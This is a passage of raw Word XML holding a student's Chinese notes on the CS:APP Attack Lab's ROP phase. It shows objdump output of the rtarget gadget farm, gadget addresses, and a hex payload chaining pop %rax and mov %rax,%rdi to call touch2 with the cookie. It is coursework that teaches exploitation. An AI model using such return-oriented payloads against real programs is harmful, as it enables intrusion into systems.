        <w:t>3、只能使用两个 gadget完成攻击；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4683BD" w14:textId="5B38E058" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="30038562" w14:textId="6AF0A700" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="0F49AB2B" w14:textId="18384F44" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="4345917C" w14:textId="5EEB1B36" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="7C7FC64C" w14:textId="09F291F9" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="60F84D35" w14:textId="30B6D5B4" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="71311FFF" w14:textId="720DB588" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="733D6CEE" w14:textId="2809702F" w:rsidR="00FF5642" w:rsidRDefault="00104958" w:rsidP="00FF5642">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60645FD3" wp14:editId="7CA6DA16">
            <wp:extent cx="5274310" cy="5383530"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="16" name="图片 16" descr="Co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ng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542A" w14:textId="77777777" w:rsidR="007F6F1D" w:rsidRDefault="007F6F1D" w:rsidP="007F6F1D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要把</w:t>
      </w:r>
      <w:r>
        <w:t>cookie放入rid，然后跳转到touch2即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F779550" w14:textId="502DE181" w:rsidR="007F6F1D" w:rsidRDefault="007F6F1D" w:rsidP="007F6F1D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为没有给放入立即数的操作，所以要</w:t>
      </w:r>
      <w:r>
        <w:t>pop寄存器来放入数字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40175768" w14:textId="34ACB6C3" w:rsidR="00E148CC" w:rsidRDefault="007F6F1D" w:rsidP="00870781">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:t>farm里没有pop %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 的5f代码，只能pop %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，再mov %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>将其放入</w:t>
      </w:r>
      <w:r w:rsidR="00E148CC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A99385" w14:textId="77777777" w:rsidR="007F6F1D" w:rsidRDefault="007F6F1D" w:rsidP="007F6F1D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以需要的代码是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248D1B4D" w14:textId="1F757ADB" w:rsidR="007F6F1D" w:rsidRPr="00E148CC" w:rsidRDefault="007F6F1D" w:rsidP="007F6F1D">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E148CC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>58</w:t>
      </w:r>
      <w:r w:rsidR="00870781">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00870781" w:rsidRPr="00870781">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00870781">
        <w:t>popq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00870781">
        <w:tab/>
        <w:t xml:space="preserve"> %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00870781">
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4245DD0D" w14:textId="60EC2C8E" w:rsidR="00FF5642" w:rsidRDefault="007F6F1D" w:rsidP="00FF5642">
      <w:r w:rsidRPr="00E148CC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>48 89 c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E148CC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00870781">
        <w:t xml:space="preserve">  mov</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00870781">
        <w:t xml:space="preserve"> %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00870781">
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00870781">
        <w:t>,%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00870781">
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F3604DC" w14:textId="0D218E06" w:rsidR="00FF5642" w:rsidRDefault="00EC63C4" w:rsidP="00FF5642">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC63C4">
        <w:t>objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC63C4">
        <w:t xml:space="preserve"> -d </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC63C4">
        <w:t>rtarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC63C4">
        <w:t xml:space="preserve"> &gt; rtarget.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A062233" w14:textId="7000EBFF" w:rsidR="00E148CC" w:rsidRDefault="00E148CC" w:rsidP="00FF5642">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以找到farm：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36417CFC" w14:textId="77777777" w:rsidR="00CC0662" w:rsidRDefault="00CC0662" w:rsidP="00CC0662">
      <w:r>
        <w:t>0000000000002123 &lt;getval_436&gt;:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0964AB43" w14:textId="77777777" w:rsidR="00CC0662" w:rsidRDefault="00CC0662" w:rsidP="00CC0662">
      <w:r>
        <w:t xml:space="preserve">    2123:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">f3 0f 1e fa          </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">endbr64 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760AE967" w14:textId="77777777" w:rsidR="00CC0662" w:rsidRDefault="00CC0662" w:rsidP="00CC0662">
      <w:r>
        <w:t xml:space="preserve">    2127:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">b8 41 58 c3 22       </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>mov    $0x22c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>35841,%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1744357E" w14:textId="2EC4D61A" w:rsidR="00CC0662" w:rsidRDefault="00CC0662" w:rsidP="00CC0662">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>212c:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">c3  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381426CF" w14:textId="77777777" w:rsidR="00CC0662" w:rsidRDefault="00CC0662" w:rsidP="00CC0662">
      <w:r>
        <w:t>000000000000214e &lt;addval_238&gt;:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7821B713" w14:textId="77777777" w:rsidR="00CC0662" w:rsidRDefault="00CC0662" w:rsidP="00CC0662">
      <w:r>
        <w:t xml:space="preserve">    214e:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">f3 0f 1e fa          </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">endbr64 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407958FA" w14:textId="77777777" w:rsidR="00CC0662" w:rsidRDefault="00CC0662" w:rsidP="00CC0662">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    2152:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">8d 87 f8 48 89 c7    </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>lea    -0x3876b708(%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4EE2554F" w14:textId="024DF8ED" w:rsidR="00CC0662" w:rsidRDefault="00CC0662" w:rsidP="00CC0662">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>2158:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">c3                  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>retq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D6A92F" w14:textId="064F645B" w:rsidR="00FF5642" w:rsidRDefault="00CC7C7B" w:rsidP="00CC0662">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00CC0662">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00CC0662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x5</w:t>
      </w:r>
      <w:r w:rsidR="00CC0662">
        <w:t>55555556129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEC22F5" w14:textId="0591FBE1" w:rsidR="00CC0662" w:rsidRDefault="00CC0662" w:rsidP="00FF5642">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：0x</w:t>
      </w:r>
      <w:r>
        <w:t>555555556155</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C78A022" w14:textId="4708FA65" w:rsidR="00870781" w:rsidRDefault="00870781" w:rsidP="00FF5642">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281CA759" w14:textId="30BF46F7" w:rsidR="00870781" w:rsidRDefault="00870781" w:rsidP="00870781">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>popq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   //</w:t>
      </w:r>
      <w:r w:rsidRPr="00870781">
        <w:t>0x555555556129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4CD673" w14:textId="2DFF9895" w:rsidR="00870781" w:rsidRDefault="00870781" w:rsidP="00870781">
      <w:r>
        <w:t>ret            //</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CBE0CF" w14:textId="212E8554" w:rsidR="00870781" w:rsidRDefault="00870781" w:rsidP="00870781">
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>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  <w:r>
        <w:t xml:space="preserve"> //0</w:t>
      </w:r>
      <w:r w:rsidRPr="00870781">
        <w:t>x555555556155</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7ABEA5" w14:textId="6C7C0F62" w:rsidR="00870781" w:rsidRDefault="00870781" w:rsidP="00870781">
      <w:r>
        <w:t xml:space="preserve">ret       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187D1D14" w14:textId="10BDBE96" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="1A84A3D1" w14:textId="77777777" w:rsidR="00870781" w:rsidRDefault="00870781" w:rsidP="00870781">
      <w:pPr>
        <w:ind w:leftChars="700" w:left="1470"/>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8D3A3A" w14:textId="77777777" w:rsidR="00870781" w:rsidRDefault="00870781" w:rsidP="00870781">
      <w:pPr>
        <w:ind w:leftChars="700" w:left="1470"/>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFFB0D7" w14:textId="77777777" w:rsidR="00870781" w:rsidRDefault="00870781" w:rsidP="00870781">
      <w:pPr>
        <w:ind w:leftChars="700" w:left="1470"/>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353005FE" w14:textId="77777777" w:rsidR="00870781" w:rsidRDefault="00870781" w:rsidP="00870781">
      <w:pPr>
        <w:ind w:leftChars="700" w:left="1470"/>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E62AB9B" w14:textId="77777777" w:rsidR="00870781" w:rsidRDefault="00870781" w:rsidP="00870781">
      <w:pPr>
        <w:ind w:leftChars="700" w:left="1470"/>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5E13F9" w14:textId="77777777" w:rsidR="00870781" w:rsidRDefault="00870781" w:rsidP="00870781">
      <w:pPr>
        <w:ind w:leftChars="700" w:left="1470"/>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06314048" w14:textId="252DD5C9" w:rsidR="00870781" w:rsidRDefault="00870781" w:rsidP="00870781">
      <w:pPr>
        <w:ind w:leftChars="700" w:left="1470"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">00 00 00 00 00 00 </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>00 00  //</w:t>
      </w:r>
      <w:r w:rsidRPr="00870781">
        <w:t>以上代码填满整个缓冲区以致溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7BB158" w14:textId="7D93304F" w:rsidR="00870781" w:rsidRDefault="00870781" w:rsidP="00870781">
      <w:pPr>
        <w:ind w:leftChars="700" w:left="1470"/>
      </w:pPr>
      <w:r>
        <w:t>29 61</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve"> 55 55 55 55 00 00</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00870781">
        <w:t>//用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00870781">
        <w:t>popq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00870781">
        <w:t xml:space="preserve"> %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00870781">
        <w:t>的起始地址覆盖原先的返回地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664F56BB" w14:textId="16B0EF67" w:rsidR="00870781" w:rsidRDefault="00870781" w:rsidP="00870781">
      <w:pPr>
        <w:ind w:leftChars="700" w:left="1470"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">77 a1 90 40 00 00 00 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>00  /</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBF3501" w14:textId="713E089D" w:rsidR="00870781" w:rsidRDefault="00870781" w:rsidP="00870781">
      <w:pPr>
        <w:ind w:leftChars="700" w:left="1470"/>
      </w:pPr>
      <w:r>
        <w:t>55 61</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve"> 55 55 55 55 00 00</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用 mov</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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，</w:t>
      </w:r>
      <w:r>
        <w:t>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的起始地址覆盖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F62DCD" w14:textId="3AB1ED38" w:rsidR="00FF5642" w:rsidRDefault="00870781" w:rsidP="00870781">
      <w:pPr>
        <w:ind w:leftChars="700" w:left="1470"/>
      </w:pPr>
      <w:r>
        <w:t>44 5f</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve"> 55 55 55 55 00 00</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>touch</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的起始地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF6A8F7" w14:textId="286A6EB4" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="508E8374" w14:textId="0655DF0C" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="275A8409" w14:textId="1250D50A" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="3E8DE326" w14:textId="079B67BB" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="18974582" w14:textId="188DEC2E" w:rsidR="00FF5642" w:rsidRDefault="00FF5642"/>
    <w:p w14:paraId="4D843A05" w14:textId="54CBEF7D" w:rsidR="00104958" w:rsidRDefault="00104958"/>
    <w:p w14:paraId="3866FB90" w14:textId="3091DC65" w:rsidR="00104958" w:rsidRDefault="00104958"/>
    <w:p w14:paraId="25F08B6A" w14:textId="640FCB59" w:rsidR="00104958" w:rsidRDefault="00104958"/>
    <w:p w14:paraId="4A793ED6" w14:textId="0747A359" w:rsidR="00104958" w:rsidRDefault="00104958"/>
    <w:p w14:paraId="63BB6DE2" w14:textId="287373B6" w:rsidR="00104958" w:rsidRDefault="00104958"/>
    <w:p w14:paraId="702AC336" w14:textId="338FF45E" w:rsidR="00104958" w:rsidRDefault="00104958"/>
    <w:p w14:paraId="349E7677" w14:textId="3E339589" w:rsidR="00104958" w:rsidRDefault="00104958"/>
    <w:p w14:paraId="5BFC8E98" w14:textId="77777777" w:rsidR="00104958" w:rsidRDefault="00104958"/>
    <w:sectPr w:rsidR="0010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D"/>
    <w:rsid w:val="000A5354"/>
    <w:rsid w:val="00102B1F"/>
    <w:rsid w:val="00104958"/>
    <w:rsid w:val="00192342"/>
    <w:rsid w:val="003A67A4"/>
    <w:rsid w:val="00590EF8"/>
    <w:rsid w:val="005B6CA8"/>
    <w:rsid w:val="00676DA3"/>
    <w:rsid w:val="00776D9B"/>
    <w:rsid w:val="007F6F1D"/>
    <w:rsid w:val="00870781"/>
    <w:rsid w:val="008E58F8"/>
    <w:rsid w:val="00B27A32"/>
    <w:rsid w:val="00BD572A"/>
    <w:rsid w:val="00C2120D"/>
    <w:rsid w:val="00C511FE"/>
    <w:rsid w:val="00CC0662"/>
    <w:rsid w:val="00CC7C7B"/>
    <w:rsid w:val="00E148CC"/>
    <w:rsid w:val="00E21A87"/>
    <w:rsid w:val="00EC63C4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E94"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{41A84AA2-8371-45D2-B129-B18E06F7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小卉</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>唐 小卉</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-04T02:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-05T15:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>